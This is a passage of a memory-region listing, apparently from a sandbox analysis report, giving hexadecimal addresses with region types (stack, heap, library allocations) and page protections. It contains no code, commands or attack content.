page read and write
|
||
|
B56D13E000
|
stack
|
page read and write
|
||
|
32AC37E000
|
stack
|
page read and write
|
||
|
7FFB1E4B0000
|
unkown
|
page readonly
|
||
|
1FC964E9000
|
heap
|
page read and write
|
||
|
7FFAAC4AB000
|
trusted library allocation
|
page read and write
|
||
|
1BD0011B000
|
trusted library allocation
|
page read and write
|
||
|
1BD757E3000
|
trusted library allocation
|
page read and write
|
||
|
1FC90CAF000
|
heap
|
page read and write
|
||
|
1BD75CC0000
|
heap
|
page read and write
|
||
|
93C18FB000
|
stack
|
page read and write
|
||
|
217A6050000
|
heap
|
page read and write
|
||
|
32AC17E000
|
stack
|
page read and write
|
||
|
2178C10B000
|
heap
|
page read and write
|
||
|
7FFB1E4C6000
|
unkown
|
page readonly
|
||
|
219E1151000
|
trusted library allocation
|
page read and write
|
||
|
1FC96190000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E4B0000
|
unkown
|
page readonly
|
||
|
7FFAAC576000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB1E4D0000
|
unkown
|
page read and write
|
||
|
1FC91A40000
|
trusted library allocation
|
page read and write
|
||
|
2178F1EA000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
B56DC43000
|
stack
|
page read and write
|
||
|
19D59810000
|
heap
|
page read and write
|
||
|
1FC962E0000
|
trusted library allocation
|
page read and write
|
||
|
1FC90D17000
|
heap
|
page read and write
|
||
|
7FFAAC7E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC550000
|
trusted library allocation
|
page execute and read and write
|
||
|
219DDC30000
|
heap
|
page read and write
|
||
|
49B3B79000
|
stack
|
page read and write
|
||
|
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
|
1BD757E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD0010E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB1E4B1000
|
unkown
|
page execute read
|
||
|
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC641000
|
trusted library allocation
|
page read and write
|
||
|
3D307FE000
|
stack
|
page read and write
|
||
|
A351F7F000
|
stack
|
page read and write
|
||
|
7FFAAC7C0000
|
trusted library allocation
|
page read and write
|
||
|
2179DAF1000
|
trusted library allocation
|
page read and write
|
||
|
1EC73BB0000
|
heap
|
page read and write
|
||
|
7FFAAC492000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC53C000
|
trusted library allocation
|
page execute and read and write
|
||
|
B56CF3E000
|
stack
|
page read and write
|
||
|
1E22A410000
|
trusted library allocation
|
page read and write
|
||
|
2178F753000
|
trusted library allocation
|
page read and write
|
||
|
1FC96170000
|
trusted library allocation
|
page read and write
|
||
|
1E228A65000
|
heap
|
page read and write
|
||
|
7FFB1E4D5000
|
unkown
|
page readonly
|
||
|
2178C147000
|
heap
|
page read and write
|
||
|
1FC92100000
|
trusted library allocation
|
page read and write
|
||
|
12F1C2D0000
|
heap
|
page read and write
|
||
|
1FC913D1000
|
trusted library allocation
|
page read and write
|
||
|
219F7AE0000
|
heap
|
page read and write
|
||
|
12F1C460000
|
heap
|
page read and write
|
||
|
1FC90C2B000
|
heap
|
page read and write
|
||
|
219F7EE0000
|
heap
|
page read and write
|
||
|
219E18BE000
|
trusted library allocation
|
page read and write
|
||
|
1FC90CB3000
|
heap
|
page read and write
|
||
|
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
|
1EC73F04000
|
heap
|
page read and write
|
||
|
7FFAAC7C0000
|
trusted library allocation
|
page read and write
|
||
|
1FC964B0000
|
heap
|
page read and write
|
||
|
7FFB1E4C6000
|
unkown
|
page readonly
|
||
|
7FFB1E4C6000
|
unkown
|
page readonly
|
||
|
2178C000000
|
heap
|
page read and write
|
||
|
7FFAAC4AB000
|
trusted library allocation
|
page read and write
|
||
|
B56D23E000
|
stack
|
page read and write
|
||
|
1FC90CFF000
|
heap
|
page read and write
|
||
|
219DF910000
|
heap
|
page readonly
|
||
|
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
|
32ACE4E000
|
stack
|
page read and write
|
||
|
1BD004DC000
|
trusted library allocation
|
page read and write
|
||
|
32ABF7E000
|
stack
|
page read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
1FC96500000
|
heap
|
page read and write
|
||
|
219DDD40000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
|
1BD73C10000
|
heap
|
page read and write
|
||
|
1FC91C80000
|
trusted library allocation
|
page read and write
|
||
|
219DDC0D000
|
heap
|
page read and write
|
||
|
7FFAAC672000
|
trusted library allocation
|
page read and write
|
||
|
2178C050000
|
heap
|
page read and write
|
||
|
1E22A3D0000
|
heap
|
page read and write
|
||
|
7FFAAC88B000
|
trusted library allocation
|
page read and write
|
||
|
1E242BB3000
|
heap
|
page read and write
|
||
|
1FC90CA3000
|
heap
|
page read and write
|
||
|
4F5E17B000
|
stack
|
page read and write
|
||
|
1BD0007D000
|
trusted library allocation
|
page read and write
|
||
|
219F7F5C000
|
heap
|
page read and write
|
||
|
1E22B210000
|
trusted library allocation
|
page read and write
|
||
|
219DDAC0000
|
heap
|
page read and write
|
||
|
A351DFE000
|
stack
|
page read and write
|
||
|
1FC964D2000
|
heap
|
page read and write
|
||
|
1FC96422000
|
heap
|
page read and write
|
||
|
7FFAAC800000
|
trusted library allocation
|
page read and write
|
||
|
219F7DD7000
|
heap
|
page execute and read and write
|
||
|
A35207C000
|
stack
|
page read and write
|
||
|
219F7CEA000
|
heap
|
page read and write
|
||
|
7FFB1E4D2000
|
unkown
|
page readonly
|
||
|
1E22A4A0000
|
trusted library allocation
|
page read and write
|
||
|
219F7CF0000
|
heap
|
page execute and read and write
|
||
|
7FFAAC87D000
|
trusted library allocation
|
page execute and read and write
|
||
|
219DDBC5000
|
heap
|
page read and write
|
||
|
219EFDCA000
|
trusted library allocation
|
page read and write
|
||
|
1FC967F0000
|
trusted library allocation
|
page read and write
|
||
|
1FC96330000
|
remote allocation
|
page read and write
|
||
|
7FFB1E4D2000
|
unkown
|
page readonly
|
||
|
1FC96270000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACAE0000
|
trusted library allocation
|
page read and write
|
||
|
1E22A3D5000
|
heap
|
page read and write
|
||
|
1FC91504000
|
heap
|
page read and write
|
||
|
217A6210000
|
heap
|
page read and write
|
||
|
32AC27D000
|
stack
|
page read and write
|
||
|
1BD75630000
|
trusted library allocation
|
page read and write
|
||
|
1BD73C55000
|
heap
|
page read and write
|
||
|
1FC91513000
|
heap
|
page read and write
|
||
|
1BD76190000
|
heap
|
page read and write
|
||
|
7FFB1E4D2000
|
unkown
|
page readonly
|
||
|
217A5FA2000
|
heap
|
page read and write
|
||
|
1FC961C0000
|
trusted library allocation
|
page read and write
|
||
|
1FC96330000
|
remote allocation
|
page read and write
|
||
|
1FC90CA3000
|
heap
|
page read and write
|
||
|
4F5E1FE000
|
stack
|
page read and write
|
||
|
7FFAAC540000
|
trusted library allocation
|
page read and write
|
||
|
1FC962F0000
|
trusted library allocation
|
page read and write
|
||
|
1BD75CE8000
|
heap
|
page read and write
|
||
|
219DDBA1000
|
heap
|
page read and write
|
||
|
4F5E6BF000
|
stack
|
page read and write
|
||
|
217A601A000
|
heap
|
page read and write
|
||
|
219DDCC4000
|
heap
|
page read and write
|
||
|
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
|
B56D0BF000
|
stack
|
page read and write
|
||
|
93C15FD000
|
stack
|
page read and write
|
||
|
1E242C18000
|
heap
|
page read and write
|
||
|
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
|
1E242DD9000
|
heap
|
page read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
1E242BAB000
|
heap
|
page read and write
|
||
|
1E242B51000
|
heap
|
page read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC964EB000
|
heap
|
page read and write
|
||
|
7FFAACA21000
|
trusted library allocation
|
page read and write
|
||
|
1BD73C80000
|
heap
|
page read and write
|
||
|
1FC90D06000
|
heap
|
page read and write
|
||
|
219DDBC9000
|
heap
|
page read and write
|
||
|
1FC90CA1000
|
heap
|
page read and write
|
||
|
32ABBBF000
|
stack
|
page read and write
|
||
|
1E22A7CA000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E4D0000
|
unkown
|
page read and write
|
||
|
1BD73CA9000
|
heap
|
page read and write
|
||
|
7FFAAC670000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E2289C0000
|
heap
|
page read and write
|
||
|
4F5E07D000
|
stack
|
page read and write
|
||
|
1FC96330000
|
remote allocation
|
page read and write
|
||
|
1E228A67000
|
heap
|
page read and write
|
||
|
1FC96461000
|
heap
|
page read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E4D5000
|
unkown
|
page readonly
|
||
|
12F1C322000
|
heap
|
page read and write
|
||
|
7FFB1E4B1000
|
unkown
|
page execute read
|
||
|
1EC73BE0000
|
heap
|
page read and write
|
||
|
219DD9C0000
|
heap
|
page read and write
|
||
|
1FC90D02000
|
heap
|
page read and write
|
||
|
219E114D000
|
trusted library allocation
|
page read and write
|
||
|
217A6233000
|
heap
|
page read and write
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7C0000
|
trusted library allocation
|
page read and write
|
||
|
B56C8F2000
|
stack
|
page read and write
|
||
|
7FFAAC874000
|
trusted library allocation
|
page read and write
|
||
|
1FC91415000
|
heap
|
page read and write
|
||
|
4F5E7BE000
|
stack
|
page read and write
|
||
|
12F1C2F0000
|
heap
|
page read and write
|
||
|
1FC90C6F000
|
heap
|
page read and write
|
||
|
1E22A3F0000
|
trusted library allocation
|
page read and write
|
||
|
7DF422AE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E23A6B1000
|
trusted library allocation
|
page read and write
|
||
|
1BD73CDE000
|
heap
|
page read and write
|
||
|
4F5E5BA000
|
stack
|
page read and write
|
||
|
217A6012000
|
heap
|
page read and write
|
||
|
7FFAAC494000
|
trusted library allocation
|
page read and write
|
||
|
1FC90CB7000
|
heap
|
page read and write
|
||
|
1E242D3C000
|
heap
|
page read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB1E4D0000
|
unkown
|
page read and write
|
||
|
19D57E10000
|
heap
|
page read and write
|
||
|
1BD75D6D000
|
heap
|
page read and write
|
||
|
1FC9642F000
|
heap
|
page read and write
|
||
|
1E23A6C0000
|
trusted library allocation
|
page read and write
|
||
|
4F5F20E000
|
stack
|
page read and write
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC530000
|
trusted library allocation
|
page read and write
|
||
|
1BD00062000
|
trusted library allocation
|
page read and write
|
||
|
217A65F0000
|
heap
|
page read and write
|
||
|
1FC90CB7000
|
heap
|
page read and write
|
||
|
1E2289E0000
|
heap
|
page read and write
|
||
|
4F5E83B000
|
stack
|
page read and write
|
||
|
19D57C50000
|
heap
|
page read and write
|
||
|
219DFAE1000
|
trusted library allocation
|
page read and write
|
||
|
1FC964C6000
|
heap
|
page read and write
|
||
|
32ABBFF000
|
stack
|
page read and write
|
||
|
7FFAACBD0000
|
trusted library allocation
|
page read and write
|
||
|
1FC90C91000
|
heap
|
page read and write
|
||
|
1E22A6F8000
|
trusted library allocation
|
page read and write
|
||
|
219F7DD0000
|
heap
|
page execute and read and write
|
||
|
7FFAAC990000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F5E73E000
|
stack
|
page read and write
|
||
|
A351B7E000
|
stack
|
page read and write
|
||
|
1E23A71F000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC930000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB1E4B1000
|
unkown
|
page execute read
|
||
|
7FFAACA2A000
|
trusted library allocation
|
page read and write
|
||
|
1BD75D03000
|
heap
|
page read and write
|
||
|
1E22B203000
|
trusted library allocation
|
page read and write
|
||
|
1E242B10000
|
heap
|
page execute and read and write
|
||
|
1FC90CB7000
|
heap
|
page read and write
|
||
|
7FFAAC490000
|
trusted library allocation
|
page read and write
|
||
|
19D580AE000
|
heap
|
page read and write
|
||
|
1E242D62000
|
heap
|
page read and write
|
||
|
217A623B000
|
heap
|
page read and write
|
||
|
217A6271000
|
heap
|
page read and write
|
||
|
2178F757000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E4D0000
|
unkown
|
page read and write
|
||
|
219DFB6D000
|
trusted library allocation
|
page read and write
|
||
|
219EFDD9000
|
trusted library allocation
|
page read and write
|
||
|
2AB23FE000
|
stack
|
page read and write
|
||
|
219DFAD0000
|
heap
|
page read and write
|
||
|
1FC90CB3000
|
heap
|
page read and write
|
||
|
2179DAE1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC550000
|
trusted library allocation
|
page execute and read and write
|
||
|
219E1127000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
|
1BD75D93000
|
heap
|
page read and write
|
||
|
A351D7E000
|
stack
|
page read and write
|
||
|
7FFB1E4D0000
|
unkown
|
page read and write
|
||
|
7FFAACA52000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC873000
|
trusted library allocation
|
page execute and read and write
|
||
|
A351C7E000
|
stack
|
page read and write
|
||
|
B56CC7F000
|
stack
|
page read and write
|
||
|
1BD73C00000
|
heap
|
page read and write
|
||
|
7FFAAC493000
|
trusted library allocation
|
page execute and read and write
|
||
|
32ABE7E000
|
stack
|
page read and write
|
||
|
1FC91700000
|
trusted library allocation
|
page read and write
|
||
|
1DD6AB10000
|
heap
|
page read and write
|
||
|
B56DC8E000
|
stack
|
page read and write
|
||
|
7FFB1E4D5000
|
unkown
|
page readonly
|
||
|
1DD69170000
|
heap
|
page read and write
|
||
|
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
|
93C13FF000
|
stack
|
page read and write
|
||
|
4F5DD7E000
|
stack
|
page read and write
|
||
|
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
|
1FC96192000
|
trusted library allocation
|
page read and write
|
||
|
1FC961C0000
|
trusted library allocation
|
page read and write
|
||
|
2AB1FFF000
|
stack
|
page read and write
|
||
|
219DF990000
|
trusted library allocation
|
page read and write
|
||
|
49B507D000
|
stack
|
page read and write
|
||
|
7FFAAC672000
|
trusted library allocation
|
page read and write
|
||
|
1BD73CE3000
|
heap
|
page read and write
|
||
|
7FFAAC4B0000
|
trusted library allocation
|
page read and write
|
||
|
A351CFF000
|
stack
|
page read and write
|
||
|
4F5E2FF000
|
stack
|
page read and write
|
||
|
4F5DDFE000
|
stack
|
page read and write
|
||
|
7FFAAC4A0000
|
trusted library allocation
|
page read and write
|
||
|
2179DB56000
|
trusted library allocation
|
page read and write
|
||
|
1FC90D29000
|
heap
|
page read and write
|
||
|
219F7C2D000
|
heap
|
page read and write
|
||
|
219DDB20000
|
heap
|
page read and write
|
||
|
2178F1B3000
|
trusted library allocation
|
page read and write
|
||
|
19D57D30000
|
heap
|
page read and write
|
||
|
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
|
219E1928000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
|
219DDC11000
|
heap
|
page read and write
|
||
|
1FC90BE0000
|
heap
|
page read and write
|
||
|
1E242D34000
|
heap
|
page read and write
|
||
|
2178F547000
|
trusted library allocation
|
page read and write
|
||
|
219EFC93000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
|
219DDBD3000
|
heap
|
page read and write
|
||
|
1E228A5E000
|
heap
|
page read and write
|
||
|
217A5F96000
|
heap
|
page execute and read and write
|
||
|
2178F1D7000
|
trusted library allocation
|
page read and write
|
||
|
1E22A7CD000
|
trusted library allocation
|
page read and write
|
||
|
1FC96260000
|
trusted library allocation
|
page read and write
|
||
|
4F5E37D000
|
stack
|
page read and write
|
||
|
1DD68F40000
|
heap
|
page read and write
|
||
|
1FC96484000
|
heap
|
page read and write
|
||
|
49B3677000
|
stack
|
page read and write
|
||
|
2178C10D000
|
heap
|
page read and write
|
||
|
32AC47B000
|
stack
|
page read and write
|
||
|
1E242DA7000
|
heap
|
page read and write
|
||
|
7FFAAC566000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC546000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
|
1E228AAB000
|
heap
|
page read and write
|
||
|
1FC96503000
|
heap
|
page read and write
|
||
|
1EC73B90000
|
heap
|
page read and write
|
||
|
7FFAAC49D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD75650000
|
trusted library allocation
|
page read and write
|
||
|
1BD00111000
|
trusted library allocation
|
page read and write
|
||
|
B56CEF9000
|
stack
|
page read and write
|
||
|
7FFAAC790000
|
trusted library allocation
|
page read and write
|
||
|
1FC90C74000
|
heap
|
page read and write
|
||
|
1BD75EC0000
|
heap
|
page execute and read and write
|
||
|
1E242B16000
|
heap
|
page execute and read and write
|
||
|
1E242D20000
|
heap
|
page read and write
|
||
|
1FC962E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7D0000
|
trusted library allocation
|
page read and write
|
||
|
A351A7D000
|
stack
|
page read and write
|
||
|
1E22B1EC000
|
trusted library allocation
|
page read and write
|
||
|
3D308FE000
|
stack
|
page read and write
|
||
|
219DDB59000
|
heap
|
page read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page execute and read and write
|
||
|
2178F1D3000
|
trusted library allocation
|
page read and write
|
||
|
49B577E000
|
unkown
|
page readonly
|
||
|
49B417B000
|
stack
|
page read and write
|
||
|
1E22B227000
|
trusted library allocation
|
page read and write
|
||
|
217A5FA0000
|
heap
|
page read and write
|
||
|
7FFAACB20000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E4D0000
|
unkown
|
page read and write
|
||
|
219F7CC5000
|
heap
|
page read and write
|
||
|
217A6246000
|
heap
|
page read and write
|
||
|
7FFAAC576000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD10001000
|
trusted library allocation
|
page read and write
|
||
|
2178F331000
|
trusted library allocation
|
page read and write
|
||
|
1FC964C0000
|
heap
|
page read and write
|
||
|
A351BFE000
|
stack
|
page read and write
|
||
|
1BD00117000
|
trusted library allocation
|
page read and write
|
||
|
1FC961D0000
|
trusted library allocation
|
page read and write
|
||
|
1BD75670000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB80000
|
trusted library allocation
|
page read and write
|
||
|
2AB198A000
|
stack
|
page read and write
|
||
|
7FFAACA40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC964F4000
|
heap
|
page read and write
|
||
|
217A6134000
|
heap
|
page read and write
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
1E242B20000
|
heap
|
page read and write
|
||
|
7FFAAC4A0000
|
trusted library allocation
|
page read and write
|
||
|
1BD73CEB000
|
heap
|
page read and write
|
||
|
7FFAACBB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACAB0000
|
trusted library allocation
|
page read and write
|
||
|
1BD73C30000
|
heap
|
page read and write
|
||
|
1E22A7BF000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC641000
|
trusted library allocation
|
page read and write
|
||
|
2178F68E000
|
trusted library allocation
|
page read and write
|
||
|
219DDBCF000
|
heap
|
page read and write
|
||
|
3F19EFF000
|
unkown
|
page read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E242BDE000
|
heap
|
page read and write
|
||
|
B56C9FE000
|
stack
|
page read and write
|
||
|
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
|
93C0FFF000
|
stack
|
page read and write
|
||
|
1E228AA6000
|
heap
|
page read and write
|
||
|
1E242DDD000
|
heap
|
page read and write
|
||
|
1FC96180000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E4D2000
|
unkown
|
page readonly
|
||
|
1FC9151A000
|
heap
|
page read and write
|
||
|
7FFAAC4DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC90C5B000
|
heap
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC920000
|
trusted library allocation
|
page read and write
|
||
|
1E228A6D000
|
heap
|
page read and write
|
||
|
2AB24FF000
|
stack
|
page read and write
|
||
|
7FFAAC494000
|
trusted library allocation
|
page read and write
|
||
|
219DDC0B000
|
heap
|
page read and write
|
||
|
32ABAB3000
|
stack
|
page read and write
|
||
|
2178DA00000
|
heap
|
page execute and read and write
|
||
|
1E22A6A0000
|
heap
|
page execute and read and write
|
||
|
219F7F05000
|
heap
|
page read and write
|
||
|
1FC97000000
|
heap
|
page read and write
|
||
|
12F1DC60000
|
heap
|
page read and write
|
||
|
1BD00114000
|
trusted library allocation
|
page read and write
|
||
|
1E242D73000
|
heap
|
page read and write
|
||
|
1BD00044000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
|
1FC90CAF000
|
heap
|
page read and write
|
||
|
1FC961D4000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB40000
|
trusted library allocation
|
page read and write
|
||
|
1FC96700000
|
trusted library allocation
|
page read and write
|
||
|
B56CDFE000
|
stack
|
page read and write
|
||
|
2178C0FE000
|
heap
|
page read and write
|
||
|
219F7DE0000
|
heap
|
page read and write
|
||
|
2178D9A0000
|
heap
|
page read and write
|
||
|
1FC96191000
|
trusted library allocation
|
page read and write
|
||
|
7DF4D75D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC5B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC49B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
1FC96400000
|
heap
|
page read and write
|
||
|
2178DB60000
|
trusted library allocation
|
page read and write
|
||
|
219DDB94000
|
heap
|
page read and write
|
||
|
1E242DE6000
|
heap
|
page read and write
|
||
|
1FC96260000
|
trusted library allocation
|
page read and write
|
||
|
1E242A60000
|
heap
|
page execute and read and write
|
||
|
32ACECE000
|
stack
|
page read and write
|
||
|
1E22AB6F000
|
trusted library allocation
|
page read and write
|
||
|
1E242BB9000
|
heap
|
page read and write
|
||
|
7FFB1E4B1000
|
unkown
|
page execute read
|
||
|
217A6038000
|
heap
|
page read and write
|
||
|
7FFAACB30000
|
trusted library allocation
|
page read and write
|
||
|
1DD68F47000
|
heap
|
page read and write
|
||
|
1BD75D4F000
|
heap
|
page read and write
|
||
|
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC8CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
|
2178C0C9000
|
heap
|
page read and write
|
||
|
1FC90C13000
|
heap
|
page read and write
|
||
|
1BD75EE0000
|
heap
|
page read and write
|
||
|
7FFAACBC0000
|
trusted library allocation
|
page read and write
|
||
|
2178DA40000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB70000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
1E228A7F000
|
heap
|
page read and write
|
||
|
1BD75F29000
|
heap
|
page read and write
|
||
|
2178DA43000
|
trusted library allocation
|
page read and write
|
||
|
A351EFE000
|
stack
|
page read and write
|
||
|
2178DAD5000
|
heap
|
page read and write
|
||
|
7FFAAC632000
|
trusted library allocation
|
page read and write
|
||
|
1FC96190000
|
trusted library allocation
|
page read and write
|
||
|
2AB1DFE000
|
stack
|
page read and write
|
||
|
219E112D000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC482000
|
trusted library allocation
|
page read and write
|
||
|
219DDBE3000
|
heap
|
page read and write
|
||
|
1E22B1F0000
|
trusted library allocation
|
page read and write
|
||
|
1EC73F00000
|
heap
|
page read and write
|
||
|
1EC73B80000
|
heap
|
page read and write
|
||
|
2178C090000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E4C6000
|
unkown
|
page readonly
|
||
|
1FC90CFF000
|
heap
|
page read and write
|
||
|
93C12FE000
|
stack
|
page read and write
|
||
|
3D30FFF000
|
stack
|
page read and write
|
||
|
7FFAACA70000
|
trusted library allocation
|
page read and write
|
||
|
2178C11F000
|
heap
|
page read and write
|
||
|
1FC964F9000
|
heap
|
page read and write
|
||
|
A35178E000
|
stack
|
page read and write
|
||
|
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
|
1BD10011000
|
trusted library allocation
|
page read and write
|
||
|
1FC9151A000
|
heap
|
page read and write
|
||
|
7FFAAC49D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DD68EB0000
|
heap
|
page read and write
|
||
|
217A6130000
|
heap
|
page read and write
|
||
|
1FC90C40000
|
heap
|
page read and write
|
||
|
A351AFE000
|
stack
|
page read and write
|
||
|
1FC91500000
|
heap
|
page read and write
|
||
|
219EFAF0000
|
trusted library allocation
|
page read and write
|
||
|
32ABFFE000
|
stack
|
page read and write
|
||
|
3D310FB000
|
stack
|
page read and write
|
||
|
7FFAACAC0000
|
trusted library allocation
|
page read and write
|
||
|
12F1C310000
|
heap
|
page read and write
|
||
|
1E22A70E000
|
trusted library allocation
|
page read and write
|
||
|
219DF953000
|
trusted library allocation
|
page read and write
|
||
|
2178C005000
|
heap
|
page read and write
|
||
|
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
|
2178C0B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC72A000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7F0000
|
trusted library allocation
|
page read and write
|
||
|
1BD73D25000
|
heap
|
page read and write
|
||
|
217A5F30000
|
heap
|
page execute and read and write
|
||
|
219E1192000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC54C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC6D8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E4B0000
|
unkown
|
page readonly
|
||
|
1FC961E9000
|
trusted library allocation
|
page read and write
|
||
|
1BD75686000
|
heap
|
page read and write
|
||
|
219F7BF0000
|
heap
|
page read and write
|
||
|
B56CE7E000
|
stack
|
page read and write
|
||
|
217A6076000
|
heap
|
page read and write
|
||
|
7FFAAC7D0000
|
trusted library allocation
|
page read and write
|
||
|
A352ACF000
|
stack
|
page read and write
|
||
|
1BD00154000
|
trusted library allocation
|
page read and write
|
||
|
2178BFE0000
|
heap
|
page read and write
|
||
|
1FC90C96000
|
heap
|
page read and write
|
||
|
2178D960000
|
heap
|
page readonly
|
||
|
7FFAAC790000
|
trusted library allocation
|
page read and write
|
||
|
49B3C7E000
|
unkown
|
page readonly
|
||
|
7FFAAC540000
|
trusted library allocation
|
page execute and read and write
|
||
|
49B3A7E000
|
unkown
|
page readonly
|
||
|
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
|
1BD00048000
|
trusted library allocation
|
page read and write
|
||
|
1BD00040000
|
trusted library allocation
|
page read and write
|
||
|
219DFA00000
|
heap
|
page execute and read and write
|
||
|
A351FFE000
|
stack
|
page read and write
|
||
|
2178F1AE000
|
trusted library allocation
|
page read and write
|
||
|
B56C97F000
|
stack
|
page read and write
|
||
|
93C10FF000
|
stack
|
page read and write
|
||
|
2AB20FF000
|
stack
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
|
1BD0007F000
|
trusted library allocation
|
page read and write
|
||
|
1E22A3A0000
|
heap
|
page read and write
|
||
|
1FC91402000
|
heap
|
page read and write
|
||
|
7FFAACA80000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC780000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC48D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
|
219DDCC0000
|
heap
|
page read and write
|
||
|
7FFAAC7F0000
|
trusted library allocation
|
page read and write
|
||
|
219DFD15000
|
trusted library allocation
|
page read and write
|
||
|
A35170E000
|
stack
|
page read and write
|
||
|
2AB1CFE000
|
stack
|
page read and write
|
||
|
1BD73CE9000
|
heap
|
page read and write
|
||
|
2179DC99000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
1E242D85000
|
heap
|
page read and write
|
||
|
93C0EFA000
|
stack
|
page read and write
|
||
|
4F5E3F8000
|
stack
|
page read and write
|
||
|
7FFAAC780000
|
trusted library allocation
|
page read and write
|
||
|
1BD1006B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC622000
|
trusted library allocation
|
page read and write
|
||
|
32AC2FE000
|
stack
|
page read and write
|
||
|
49B30BB000
|
